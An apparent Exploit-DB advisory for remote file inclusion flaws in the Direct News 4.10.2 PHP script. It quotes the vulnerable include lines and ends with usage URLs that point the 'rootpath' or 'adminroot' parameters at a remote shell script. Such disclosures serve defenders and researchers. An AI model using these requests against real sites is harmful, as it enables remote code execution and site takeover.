Direct News 4.10.2 Multiple Remote File Include Vulnerability

vendor:

Direct News

by:

mat

7.5

CVSS

HIGH

Remote File Include

Not mentioned

CWE

Product Name: Direct News

Affected Version From: Direct News 4.10.2

Affected Version To: Direct News 4.10.2

Patch Exists: NO

Related CWE: Not mentioned

CPE: Not mentioned

Metasploit:

Other Scripts:

Platforms Tested: Not mentioned

Not mentioned

Direct News 4.10.2 Multiple Remote File Include Vulnerability

The Direct News 4.10.2 script is vulnerable to multiple remote file inclusion vulnerabilities. The affected files include 'menu.php', 'update_content.php', 'class.backup.php', and 'lib.menu.php'. These vulnerabilities allow an attacker to include arbitrary remote files by manipulating the 'rootpath' or 'adminroot' parameters. This can lead to remote code execution and compromise the security of the application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Direct News script. Additionally, input validation and sanitization should be implemented to prevent unauthorized file inclusion.

Source

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Direct News 4.10.2 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/directnews/downloads/list
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

#################################################
#Vuln Code (directnews-4.10-open-20090506/admin/menu.php)
#
#<?...
#include_once $rootpath .'/library/lib.menu.php';
#include_once $rootpath .'/modules/menu/lib/treemenu.inc.php';
#...?>
#################################################
#################################################
#Vuln Code (directnews-4.10-open-20090506/admin/media/update_content.php)
#
#<?...
#require_once $adminroot . '/inc.php';
#require_once './lib.media.php';
#require_once $adminroot . '/verif_identite.php';
#...?>
#################################################
#################################################
#Vuln Code (directnews-4.10-open-20090506/library/class.backup.php)
#
#<?...
#require_once $adminroot .'/inc.php';
#...?>
#################################################
#################################################
#Vuln Code (directnews-4.10-open-20090506/library/lib.menu.php)
#
#<?...
#require_once $rootpath . '/library/class.menuPere.php';
#...?>
#################################################

Usage: http://[target]/[path]/admin/menu_xml.php?rootpath=http://[shellscript]
       http://[target]/[path]/admin/media/update_content.php?adminroot=http://[shellscript]
       http://[target]/[path]/library/class.backup.php?adminroot=http://[shellscript]
       http://[target]/[path]/library/lib.menu.php?rootpath=http://[shellscript]

Greetings: All Hackerz